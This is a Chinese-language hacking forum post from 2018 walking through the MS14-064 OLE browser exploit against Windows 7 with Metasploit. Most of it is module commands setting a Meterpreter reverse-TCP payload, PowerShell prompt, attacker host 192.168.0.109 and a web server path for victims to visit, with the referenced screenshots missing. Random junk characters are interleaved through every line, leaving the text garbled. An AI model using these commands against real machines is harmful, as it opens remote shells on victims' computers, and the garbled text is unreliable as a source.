找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1220|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式

* U9 F5 r2 L1 X, I/ ^ 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示7 U2 j' \7 l2 k! C

+ C2 V/ U+ `6 D, y9 ~4 @+ f

5 L; M2 Z& f" p+ O- _+ A 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 0 ` n9 ?% G4 B' B7 f

0 m: i1 f3 A: V' R+ g, a) g

A) Q% e% z" b. { 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp, o, m1 ~4 r$ W; X4 d

: i# i* `3 z+ L- ^. K

& X8 Q `4 x0 T- Y/ R8 G, d6 N             set AllowPowershellPrompt true " P( H& @3 v3 ~5 d6 K

0 a* r4 `# d7 [* T" y+ P

% C5 e- c8 t; K4 _! K/ N6 o* S% @1 ?             Set LHOST 192.168.0.109 3 \: `0 ^: h4 ^ U% C

/ ]/ X+ [9 O# `) E% ~' ~6 J

[5 W: d( i8 T0 G8 o             set SRVHOST 192.168.0.109 - k; j/ T- [2 `+ _1 c

% { w# y4 Y; C0 w. @

w! ]9 C: T6 |. ? U/ z" Y( g             Set uripath share ; D8 A9 }" C4 N. o

" z5 G6 G2 v) p2 m) @# g1 ?( C/ S1 g# g1 S

r4 r* H9 ^! X5 \+ E* K             Set srvport 80# L9 s+ w# ], I$ |! d) C& g

$ B/ v9 W, C: N- w

) d3 x* E, [6 r( M$ c; w+ o  + Q/ o% m5 N) |1 h

6 g; v J0 ?- I2 q

# |7 {2 g' t$ g% k1 }; [   9 G2 b8 t- F( h& l& Y; |

" |8 t1 j c3 Q6 I" [9 ~. k

- `) _7 t+ @$ z$ Y) J: a1 K   ; Z% u3 V, z* _+ S0 T3 }0 s

3 c- |% {3 b- }* L

- M3 W5 M! _* c6 v  , u2 W/ ?- J% x, a" i4 l& j5 m3 ^) C

+ o# s& Q, U& f

+ S# ~7 s# c R9 f9 w& Y  2 e4 H1 w9 a9 j( r4 o9 N

3 t4 c2 k- }+ Q1 H

6 X8 S$ d5 `4 W" W 下面我们来访问本地地址如图:: B" K* H) a+ i" M7 a" h

- R; Y9 W0 w0 e( V" [* ^

0 L6 ]3 L, ^5 {) Z: r5 T  & q9 p! f# ~; y7 L5 e' G+ k

6 V4 Y) J( R& W

2 h; N7 p+ {5 ~2 E r   / |& H6 E' }& h8 L D9 ~

- \* i/ {* x9 N" d" @

* u6 @' Z( d8 z. ?( _, u5 z5 l : [: q1 z6 y, I& x, K4 P+ [

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表